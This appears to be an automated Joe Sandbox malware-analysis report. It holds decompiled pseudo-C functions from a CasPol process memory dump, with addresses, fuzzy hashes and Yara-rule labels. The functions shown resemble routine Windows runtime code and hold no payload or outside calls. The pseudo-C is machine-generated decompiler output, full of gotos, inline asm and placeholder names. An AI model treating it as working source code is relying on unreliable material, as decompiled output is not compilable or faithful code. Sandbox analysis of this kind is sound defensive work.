                                                                        0x013bc98a
                                                                        0x01427c9d
                                                                        0x01427c9f
                                                                        0x01427ca4
                                                                        0x01427cae
                                                                        0x01427cf0
                                                                        0x01427cf5
                                                                        0x01427cfa
                                                                        0x013bc992
                                                                        0x013bc996
                                                                        0x013bc997
                                                                        0x013bc998
                                                                        0x013bc9a3
                                                                        0x013bc9a3
                                                                        0x01427cb0
                                                                        0x01427cb7
                                                                        0x01427cbb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427cbd
                                                                        0x01427ce8
                                                                        0x01427cc5
                                                                        0x01427cc8
                                                                        0x01427cca
                                                                        0x01427cd0
                                                                        0x01427cd6
                                                                        0x01427cde
                                                                        0x01427ce4
                                                                        0x01427ce4
                                                                        0x01427cd0
                                                                        0x00000000
                                                                        0x01427ce8
                                                                        0x013bc990
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b1851df939b4147ab3c0d5eb584e1931af080cf5a87a9fdea72b0ed895ac236
                                                                        • Instruction ID: 2fc7712810545b2465736e85cb4168fd6c2e59b5614e86b563081305540d57e6
                                                                        • Opcode Fuzzy Hash: 5b1851df939b4147ab3c0d5eb584e1931af080cf5a87a9fdea72b0ed895ac236
                                                                        • Instruction Fuzzy Hash: 571102317046169BC720AE3ECC8192BBBE5BBA4616F81012EE94583671DB30EC40C7D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F37F5 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E013F37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E013D2280(_t6, 0x14a8550);
				}
				_t29 = E013F387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E013CFFB0(0x14a8550, _t27, 0x14a8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                        0x013f37fa
                                                                        0x013f37fc
                                                                        0x013f3805
                                                                        0x013f3808
                                                                        0x013f3808
                                                                        0x013f3814
                                                                        0x013f3818
                                                                        0x013f3846
                                                                        0x013f3848
                                                                        0x013f384b
                                                                        0x013f384b
                                                                        0x013f3852
                                                                        0x00000000
                                                                        0x013f3854
                                                                        0x013f3856
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f3863
                                                                        0x00000000
                                                                        0x013f3863
                                                                        0x013f381a
                                                                        0x013f381a
                                                                        0x013f381f
                                                                        0x013f386e
                                                                        0x013f386e
                                                                        0x013f3871
                                                                        0x013f3873
                                                                        0x013f3873
                                                                        0x013f3868
                                                                        0x00000000
                                                                        0x013f3868
                                                                        0x013f3821
                                                                        0x013f3826
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f3828
                                                                        0x013f382a
                                                                        0x013f3841
                                                                        0x00000000
                                                                        0x013f3841

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 942ba117f814b7c3cfcb7bba7c6cfcf2afcf6cfa26edf48a846d58b9b24b6035
                                                                        • Instruction ID: 12e6fa525afb5c91323b2e53eec672d4312afcaf5f72f7e5c1dd225cb6f72365
                                                                        • Opcode Fuzzy Hash: 942ba117f814b7c3cfcb7bba7c6cfcf2afcf6cfa26edf48a846d58b9b24b6035
                                                                        • Instruction Fuzzy Hash: C601D6B29416219BC3378B1DD940E26BFAAFF85A68F16406DEA458B315DB38CC05C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E002D Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013E002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E013D7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E013D7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E013D7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E013D7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                        0x013e0032
                                                                        0x013e0037
                                                                        0x013e0043
                                                                        0x01424b3a
                                                                        0x013e0049
                                                                        0x013e0049
                                                                        0x013e0049
                                                                        0x013e004e
                                                                        0x013e0053
                                                                        0x01424b48
                                                                        0x01424b5a
                                                                        0x01424b4a
                                                                        0x01424b53
                                                                        0x01424b53
                                                                        0x01424b5f
                                                                        0x00000000
                                                                        0x01424b61
                                                                        0x00000000
                                                                        0x01424b61
                                                                        0x013e0059
                                                                        0x013e0059
                                                                        0x013e0060
                                                                        0x01424b6f
                                                                        0x01424b6f
                                                                        0x013e0069
                                                                        0x01424b83
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424b90
                                                                        0x01424b9b
                                                                        0x01424b9b
                                                                        0x01424ba4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424baa
                                                                        0x00000000
                                                                        0x013e006f
                                                                        0x013e006f
                                                                        0x00000000
                                                                        0x013e006f
                                                                        0x013e0069

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                        • Instruction ID: 07eae4838713b5c486fe4b5cb8b4c6a965e706c7ecffd27c490282a08c29d873
                                                                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                        • Instruction Fuzzy Hash: 1111C2326016A58FE723972CD548B267FD8EB4179CF4D00A1ED0497BE2D378CC81C250
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C766D Relevance: .1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E013C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E013EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E013EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L013D4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                        0x013c7672
                                                                        0x013c767f
                                                                        0x013c7689
                                                                        0x013c76de
                                                                        0x013c76de
                                                                        0x013c768b
                                                                        0x013c7691
                                                                        0x013c7693
                                                                        0x013c7697
                                                                        0x00000000
                                                                        0x013c7699
                                                                        0x013c76a8
                                                                        0x00000000
                                                                        0x013c76aa
                                                                        0x013c76ad
                                                                        0x013c76b1
                                                                        0x00000000
                                                                        0x013c76b3
                                                                        0x013c76b3
                                                                        0x013c76b5
                                                                        0x013c76ba
                                                                        0x013c76bc
                                                                        0x013c76bc
                                                                        0x013c76c0
                                                                        0x00000000
                                                                        0x013c76c2
                                                                        0x013c76ce
                                                                        0x013c76ce
                                                                        0x013c76c0
                                                                        0x013c76b1
                                                                        0x013c76a8
                                                                        0x013c7697
                                                                        0x013c76d9

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                        • Instruction ID: c957543afd1f6b3b46203008de488c49c4f67c5c81148260701f6f6b3fba380f
                                                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                        • Instruction Fuzzy Hash: 9A018432710119ABD7209E5ECC45E5B7BADEB94B74B280528BE09DB250DA70DD118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B9080 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E013B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x14a85ec;
				E013D2280(_t48, 0x14a85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E013CFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x14a538c; // 0x77e16828
					if( *_t84 != 0x14a5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x148f6e8);
						E0140D0E8(0x14a85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E014888F5(_t80, _t85, 0x14a5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x14a86c0; // 0xf507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x14a86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E013D2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E014888F5(0x14a85ec, _t85, 0x14a5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E013FAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x14ab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x14a84c0;
																			if(_t82 >=  *0x14a84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01489063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E013B922A(_t99);
										_t64 = E013D7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01488B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x14a86c0; // 0xf507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x14a86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x14a86bc;
													_t87 = 0x14a86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E013B9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x14a86c4;
												_t87 = 0x14a86c0;
												L27:
												E013E9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0140D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x14a5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x14a538c = _t51;
						goto L6;
					}
				}
			}




















                                                                        0x013b9082
                                                                        0x013b9083
                                                                        0x013b9084
                                                                        0x013b9085
                                                                        0x013b9087
                                                                        0x013b9096
                                                                        0x013b9098
                                                                        0x013b9098
                                                                        0x013b909e
                                                                        0x013b90a8
                                                                        0x013b90e7
                                                                        0x013b90e7
                                                                        0x013b90aa
                                                                        0x013b90b0
                                                                        0x013b90b7
                                                                        0x013b90bd
                                                                        0x013b90dd
                                                                        0x013b90e6
                                                                        0x013b90bf
                                                                        0x013b90bf
                                                                        0x013b90c7
                                                                        0x013b90cf
                                                                        0x013b90f1
                                                                        0x013b90f2
                                                                        0x013b90f4
                                                                        0x013b90f5
                                                                        0x013b90f6
                                                                        0x013b90f7
                                                                        0x013b90f8
                                                                        0x013b90f9
                                                                        0x013b90fa
                                                                        0x013b90fb
                                                                        0x013b90fc
                                                                        0x013b90fd
                                                                        0x013b90fe
                                                                        0x013b90ff
                                                                        0x013b9100
                                                                        0x013b9102
                                                                        0x013b9107
                                                                        0x013b910c
                                                                        0x013b9110
                                                                        0x013b9113
                                                                        0x013b9115
                                                                        0x013b9136
                                                                        0x013b913f
                                                                        0x013b9143
                                                                        0x014137e4
                                                                        0x014137e4
                                                                        0x013b9117
                                                                        0x013b9117
                                                                        0x013b911d
                                                                        0x00000000
                                                                        0x013b911f
                                                                        0x013b911f
                                                                        0x013b9125
                                                                        0x00000000
                                                                        0x013b9127
                                                                        0x013b912d
                                                                        0x013b9130
                                                                        0x013b9134
                                                                        0x013b9158
                                                                        0x013b915d
                                                                        0x013b9161
                                                                        0x013b9168
                                                                        0x01413715
                                                                        0x013b916e
                                                                        0x013b916e
                                                                        0x013b9175
                                                                        0x013b9177
                                                                        0x013b917e
                                                                        0x013b917f
                                                                        0x013b9182
                                                                        0x013b9182
                                                                        0x013b9187
                                                                        0x013b9187
                                                                        0x013b918a
                                                                        0x013b918d
                                                                        0x013b918f
                                                                        0x013b9192
                                                                        0x013b9195
                                                                        0x013b9198
                                                                        0x013b9198
                                                                        0x013b9198
                                                                        0x013b919a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141371f
                                                                        0x01413721
                                                                        0x01413727
                                                                        0x0141372f
                                                                        0x01413733
                                                                        0x01413735
                                                                        0x01413738
                                                                        0x0141373b
                                                                        0x0141373d
                                                                        0x01413740
                                                                        0x00000000
                                                                        0x01413746
                                                                        0x01413746
                                                                        0x01413749
                                                                        0x00000000
                                                                        0x0141374f
                                                                        0x0141374f
                                                                        0x01413751
                                                                        0x01413757
                                                                        0x01413759
                                                                        0x0141375c
                                                                        0x0141375c
                                                                        0x0141375e
                                                                        0x0141375e
                                                                        0x01413761
                                                                        0x01413764
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01413766
                                                                        0x01413768
                                                                        0x014137a3
                                                                        0x014137a3
                                                                        0x014137a5
                                                                        0x014137a7
                                                                        0x014137ad
                                                                        0x014137b0
                                                                        0x014137b2
                                                                        0x014137bc
                                                                        0x014137c2
                                                                        0x014137c2
                                                                        0x014137b2
                                                                        0x013b9187
                                                                        0x013b9187
                                                                        0x013b918a
                                                                        0x013b918d
                                                                        0x013b918f
                                                                        0x013b9192
                                                                        0x013b9195
                                                                        0x00000000
                                                                        0x013b9195
                                                                        0x00000000
                                                                        0x0141376a
                                                                        0x0141376a
                                                                        0x0141376a
                                                                        0x0141376c
                                                                        0x0141376c
                                                                        0x0141376f
                                                                        0x01413775
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01413777
                                                                        0x01413779
                                                                        0x01413782
                                                                        0x01413787
                                                                        0x01413789
                                                                        0x01413790
                                                                        0x01413790
                                                                        0x0141378b
                                                                        0x0141378b
                                                                        0x0141378b
                                                                        0x01413792
                                                                        0x01413795
                                                                        0x00000000
                                                                        0x01413795
                                                                        0x00000000
                                                                        0x01413779
                                                                        0x01413798
                                                                        0x00000000
                                                                        0x01413798
                                                                        0x00000000
                                                                        0x01413768
                                                                        0x0141379b
                                                                        0x0141379b
                                                                        0x01413751
                                                                        0x01413749
                                                                        0x00000000
                                                                        0x01413740
                                                                        0x013b91a0
                                                                        0x013b91a3
                                                                        0x013b91a9
                                                                        0x013b91b0
                                                                        0x00000000
                                                                        0x013b91b0
                                                                        0x013b9187
                                                                        0x013b91b4
                                                                        0x013b91b4
                                                                        0x013b91bb
                                                                        0x013b91c0
                                                                        0x013b91c5
                                                                        0x013b91c7
                                                                        0x014137da
                                                                        0x013b91cd
                                                                        0x013b91cd
                                                                        0x013b91cd
                                                                        0x013b91d2
                                                                        0x013b91d5
                                                                        0x013b9239
                                                                        0x013b9239
                                                                        0x013b91d7
                                                                        0x013b91db
                                                                        0x013b91e1
                                                                        0x013b91e7
                                                                        0x013b91fd
                                                                        0x013b9203
                                                                        0x013b921e
                                                                        0x013b9223
                                                                        0x00000000
                                                                        0x013b9205
                                                                        0x013b9205
                                                                        0x013b9208
                                                                        0x013b920c
                                                                        0x013b9214
                                                                        0x013b9214
                                                                        0x013b920c
                                                                        0x013b91e9
                                                                        0x013b91e9
                                                                        0x013b91ee
                                                                        0x013b91f3
                                                                        0x013b91f3
                                                                        0x013b91f3
                                                                        0x013b91e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b9134
                                                                        0x013b9125
                                                                        0x013b911d
                                                                        0x013b914e
                                                                        0x013b90d1
                                                                        0x013b90d1
                                                                        0x013b90d3
                                                                        0x013b90d6
                                                                        0x013b90d8
                                                                        0x00000000
                                                                        0x013b90d8
                                                                        0x013b90cf

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4d384e63ee2a71e257fbce6ac786ca1cd65d6589db040f869bc1b71dbbab45a2
                                                                        • Instruction ID: e578412edf8da032a23af92b3ffe37274c6ab526723cae201a3bfffe1ec4536a
                                                                        • Opcode Fuzzy Hash: 4d384e63ee2a71e257fbce6ac786ca1cd65d6589db040f869bc1b71dbbab45a2
                                                                        • Instruction Fuzzy Hash: F801F4B29016058FC3258F0CD880B12BBA9EF8132CF224026E7018FAA2D370DC41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0144C450 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E0144C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E013F9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E013F95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E013F95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E013F95D0();
				return L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                        0x0144c458
                                                                        0x0144c45d
                                                                        0x0144c466
                                                                        0x0144c468
                                                                        0x0144c469
                                                                        0x0144c46a
                                                                        0x0144c46b
                                                                        0x0144c46e
                                                                        0x0144c46f
                                                                        0x0144c471
                                                                        0x0144c476
                                                                        0x0144c476
                                                                        0x0144c47c
                                                                        0x0144c47e
                                                                        0x0144c480
                                                                        0x0144c480
                                                                        0x0144c483
                                                                        0x0144c484
                                                                        0x0144c486
                                                                        0x0144c488
                                                                        0x0144c48f
                                                                        0x0144c491
                                                                        0x0144c493
                                                                        0x0144c493
                                                                        0x0144c48f
                                                                        0x0144c498
                                                                        0x0144c49e
                                                                        0x0144c4ad
                                                                        0x0144c4ad
                                                                        0x0144c4b2
                                                                        0x0144c4b4
                                                                        0x0144c4cd

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                        • Instruction ID: 896b7ce6ead98277d1a1f1a26ff537d32a5b28f72cae0f05b148b1bcbda55d8a
                                                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                        • Instruction Fuzzy Hash: 85018072141506BFE721AF69CD84F63FB6DFB64398F05452AF21442660CB31ACA1CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01484015 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E01484015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E013D2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E013D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x14a86ac);
					E013BF900(0x14a86d4, _t28);
					E013CFFB0(0x14a86ac, _t28, 0x14a86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E013CFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                        0x0148401a
                                                                        0x0148401e
                                                                        0x01484023
                                                                        0x01484028
                                                                        0x01484029
                                                                        0x0148402b
                                                                        0x0148402f
                                                                        0x01484043
                                                                        0x01484046
                                                                        0x01484051
                                                                        0x01484057
                                                                        0x0148405f
                                                                        0x01484062
                                                                        0x01484067
                                                                        0x0148406f
                                                                        0x0148407c
                                                                        0x0148407c
                                                                        0x0148408c
                                                                        0x0148408c
                                                                        0x01484097

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba65416109a489ef5e1663f134d7d53ab6a435d1f253f0966b47b35765da0be4
                                                                        • Instruction ID: 1beb8010e67c3f59fa5f30eb587c68a9ce8b90174fddb5e71c3eaf8fee4a6c1d
                                                                        • Opcode Fuzzy Hash: ba65416109a489ef5e1663f134d7d53ab6a435d1f253f0966b47b35765da0be4
                                                                        • Instruction Fuzzy Hash: AC018F722019477FD251AB7DCD80E17F7ACFF55668B01022AF60883A21DB34EC12C6E4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
